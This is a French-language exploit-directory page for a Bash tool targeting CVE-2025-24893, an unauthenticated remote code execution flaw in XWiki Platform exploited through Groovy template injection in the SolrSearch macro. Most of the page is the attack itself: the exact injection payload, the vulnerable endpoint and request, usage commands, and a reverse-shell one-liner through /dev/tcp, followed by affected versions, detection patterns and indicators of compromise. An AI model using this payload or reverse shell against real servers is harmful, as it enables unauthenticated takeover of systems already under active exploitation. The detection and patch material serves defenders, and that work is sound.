Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — Exploit Bash pour CVE-2025-24893, RCE non authentifié dans XWiki Platform, utilisant l'injection de template dans la macro SolrSearch pour exécuter des commandes système arbitraires. | Kitploit
Outils/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

Exploit Bash pour CVE-2025-24893, RCE non authentifié dans XWiki Platform, utilisant l'injection de template dans la macro SolrSearch pour exécuter des commandes système arbitraires.

Voir le dépôt
40il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE non authentifié sur XWiki Platform

Présentation

Ce script est une implémentation Bash remaniée d'un exploit ciblant les versions de XWiki Platform affectées par CVE-2025-24893. Il exploite une vulnérabilité critique d'exécution de code à distance non authentifiée qui permet à un attaquant d'exécuter du code Groovy arbitraire via une faille d'injection de template dans la macro SolrSearch.

Les implémentations originales de l'exploit en Python ont été créées par divers chercheurs en sécurité et sont adaptées ici pour les utilisateurs Bash avec une exécution simplifiée et une meilleure ergonomie.

Détails de la vulnérabilité

  • Découvreur : John Kwak (Trend Micro's Zero Day Initiative)
  • CVE : CVE-2025-24893
  • Score CVSS : 9.8 (Critique)
  • Références :
    • Avis de sécurité officiel XWiki (GHSA-rr6p-3pfg-562j)
    • Catalogue des vulnérabilités exploitées connues de la CISA
    • VulnCheck - XWiki CVE-2025-24893 exploité dans la nature
    • Blog OffSec - RCE non authentifié dans XWiki
  • Description : La vulnérabilité provient d'une désinfection incorrecte des entrées dans la macro SolrSearch de XWiki Platform. La macro ne valide ni ne désinfecte correctement les entrées fournies par l'utilisateur dans le paramètre text lorsqu'elle est consultée via le point de terminaison RSS media, permettant à un attaquant d'injecter du code Groovy malveillant dans le pipeline de rendu sans authentification.

Versions affectées et corrigées

Versions affectées

  • XWiki Platform : 5.3-milestone-2 jusqu'à 15.10.10
  • XWiki Platform : 16.0.0-rc-1 jusqu'à 16.4.0

Versions corrigées

  • XWiki 15.10.11 ou ultérieur
  • XWiki 16.4.1 ou ultérieur
  • XWiki 16.5.0RC1 ou ultérieur

Fonctionnalités

  • RCE non authentifié : Exécute des commandes système arbitraires sans authentification.
  • Contournement du jeton CSRF : Exploite l'injection de template sans nécessiter de jetons CSRF.
  • Exécution en arrière-plan : Exécute les commandes de manière asynchrone sur le serveur cible.
  • Interface en ligne de commande simple : Script Bash facile à utiliser avec des dépendances minimales.

Prérequis

  • Dépendances :
    • curl : Pour envoyer des requêtes HTTP.
    • jq : Pour encoder l'URL de la charge utile.
    • Shell Bash.
  • Environnement testé : Système d'exploitation Linux avec Bash.

Utilisation

Attribuez les permissions d'exécution :

chmod +x CVE-2025-24893

Exécutez le script avec les arguments requis :

./CVE-2025-24893 <url_cible> <commande>

Paramètres

ParamètreDescription
<url_cible>L'URL XWiki cible (ex. http://example.com ou https://xwiki.example.org). Le protocole est optionnel.
<commande>La commande système à exécuter sur le serveur cible.

Exemple

Vérifier si la cible est vulnérable (exécuter la commande id) :

./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"

Récupérer les informations système :

./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"

Créer un fichier de test :

./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"

Shell inversé (remplacer par votre IP et port) :

./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/VOTRE_IP/VOTRE_PORT 0>&1'"

Déroulement du script

  1. Analyse des arguments en ligne de commande :

    • Valide que l'URL cible et la commande sont fournies.
    • Normalise l'URL en ajoutant http:// si aucun protocole n'est spécifié.
  2. Construction de la charge utile :

    • Construit une charge utile en code Groovy qui exécute la commande spécifiée en utilisant .execute().
    • Enveloppe la charge utile dans la syntaxe de macro XWiki : }}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
  3. Encodage URL :

    • Encode l'URL de la charge utile avec jq pour une transmission HTTP correcte.
  4. Exploitation :

    • Envoie une requête HTTP GET au point de terminaison SolrSearch vulnérable : /xwiki/bin/get/Main/SolrSearch?media=rss&text=<charge_encodée>
    • La commande s'exécute en arrière-plan sur le serveur cible.

Détails techniques

Mécanisme d'exploitation

La chaîne d'exploitation fonctionne comme suit :

  1. Injection de template : L'attaquant conçoit une charge utile malveillante contenant du code Groovy enveloppé dans la syntaxe de macro XWiki.
  2. Ciblage du point de terminaison : La charge utile est envoyée au point de terminaison RSS SolrSearch vulnérable.
  3. Exécution du code : Le code Groovy injecté est exécuté côté serveur sans authentification.
  4. Compromission du système : L'attaquant obtient une exécution de code arbitraire avec les privilèges de l'application XWiki.

Structure de la charge utile

}}}{{async async=false}}{{groovy}}'<commande>'.execute();{{/groovy}}{{/async}}
  • }}} - Ferme tout contexte de macro existant
  • {{async async=false}} - Assure une exécution synchrone
  • {{groovy}}...{{/groovy}} - Enveloppe le code Groovy malveillant
  • '<commande>'.execute(); - Exécute la commande système spécifiée

Preuve de concept

Configuration d'un environnement vulnérable

À des fins de test, vous pouvez configurer une instance XWiki vulnérable avec Docker :

docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

Démonstration d'exploitation

# Attendez que XWiki démarre (peut prendre 1 à 2 minutes)
./CVE-2025-24893 http://localhost:8080 "whoami"

Impact

Une exploitation réussie de cette vulnérabilité permet à un attaquant non authentifié de :

  • Exécuter des commandes système arbitraires sur le serveur
  • Lire, modifier ou supprimer des données sensibles
  • Compromettre l'ensemble de l'installation XWiki
  • Pivoter vers d'autres systèmes sur le réseau
  • Déployer des mineurs de cryptomonnaie ou d'autres logiciels malveillants
  • Établir un accès persistant via une porte dérobée

Exploitation dans la nature

Selon la CISA et plusieurs éditeurs de sécurité :

  • Exploitation active : CVE-2025-24893 est activement exploitée dans la nature
  • Campagnes d'attaque : VulnCheck a détecté des chaînes d'attaque en deux étapes déployant des mineurs de cryptomonnaie
  • Catalogue KEV de la CISA : Ajouté au catalogue des vulnérabilités exploitées connues le 30 octobre 2025
  • Scan généralisé : Balayage massif à l'échelle d'Internet à la recherche d'instances vulnérables

Détection et atténuation

Détection

Surveillez les requêtes suspectes vers le point de terminaison SolrSearch :

GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

Recherchez des motifs contenant :

  • {{groovy}}
  • {{async}}
  • .execute()
  • des variantes encodées en URL de ce qui précède

Indicateurs de compromission (IoCs)

  • Processus inattendus engendrés par l'utilisateur de l'application XWiki
  • Nouveaux fichiers dans /tmp ou autres répertoires inscriptibles
  • Connexions réseau sortantes vers des IP inconnues
  • Processus de minage de cryptomonnaie (utilisation élevée du CPU)

Atténuation

Télécharger l’outil